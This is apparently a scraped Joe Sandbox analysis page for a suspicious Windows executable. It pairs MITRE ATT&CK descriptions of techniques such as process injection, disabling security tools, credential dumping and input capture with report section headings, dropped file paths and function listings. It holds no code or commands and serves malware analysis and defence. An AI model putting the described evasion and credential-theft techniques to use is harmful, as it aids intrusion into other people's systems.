Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pismo1A 12.06.2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Vevine

C:\Users\user\AppData\Local\Temp\_R39449

C:\Users\user\AppData\Local\Temp\autAD5B.tmp

C:\Users\user\AppData\Local\Temp\autADB9.tmp

C:\Users\user\AppData\Local\Temp\scroll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
pismo1A 12.06.2024.exe

Function 006A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 006A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 006E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 006A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 006D8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 006E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 006A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 006A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 006A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 010C25C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 010C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre